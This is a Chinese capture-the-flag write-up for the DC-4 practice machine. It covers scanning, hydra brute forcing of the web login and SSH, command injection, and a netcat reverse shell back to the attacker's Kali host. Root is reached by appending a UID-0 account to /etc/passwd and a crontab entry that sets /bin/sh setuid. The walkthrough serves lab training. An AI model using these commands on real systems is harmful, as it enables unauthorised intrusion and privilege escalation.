下載地址
配置的環境:
kali:192.168.25.131 DC4 -靶機 和 kali 在同一C段
滲透
nmap掃描網段,發現存活主機
nmap -sP 192.168.25.0/24
發現主機 192.168.25.134,判定爲DC3-靶機,繼續使用nmap獲取詳細信息
nmap -A -p 1-65535 192.168.25.134
目標開放了80端口和ssh端口,瀏覽器訪問,一個登陸框,賬號爲admin,沒有驗證碼,嘗試弱口令爆破(字典)
hydra -l admin -P rockyou.txt 192.168.25.134 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -F
爆破得到密碼 happy,登陸,發現可以執行對應命令,嘗試命令執行漏洞
瀏覽器開代理,使用Burp抓包,改包,修改執行的命令,結果如下圖,可以執行任意命令
反彈一個shell,給kali,kali監聽,成功
nc -e /bin/sh 192.168.25.131 1234
繼續,使用python獲取交互模式
python -c 'import pty;pty.spawn("/bin/bash")'
搜索文件,在jim用戶下發現一個密碼字典備份,獲取並嘗試SSH爆破登陸
得到用戶 jim 密碼 jibril04,SSH登陸,登陸提示 郵件
hydra -L dc-4-user.txt -P old-passwd.txt -t 6 ssh://192.168.25.134
ssh [email protected]
在/var/mail/下得到charles的密碼 ^xHhA&hvim0y ,切換爲charles
sudo -l
查看權限,發現可以不需要密碼執行teehee(root權限),teehee可以來向其他文件寫入內容
利用teehee提權
1. 添加一個 test 用戶,並使用teehee執行直接寫入 passwd中(設置uid和gid都爲0,那麼這個用戶就相當於root)
#如:admin:x:0:0::/home/admin:/bin/bash
#[用戶名]:[密碼]:[UID]:[GID]:[身份描述]:[主目錄]:[登錄shell]
echo "test::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
2.通過定時任務執行腳本提權,向/etc/crontab文件中寫入新的定時任務
通過teehee的sudo提升權限以 root身份寫入crontab計劃任務通過執行獲取root權限
echo "* * * * * root chmod 4777 /bin/sh" | sudo teehee -a /etc/crontab
時間部分全部填寫爲*,默認這個定時任務每分鐘執行一次。
通過執行的腳本將 /bin/sh 的權限修改爲4777,這樣就可以在非root用戶下執行它,並且執行期間擁有root權限。
啓一個終端
總結: 略簡單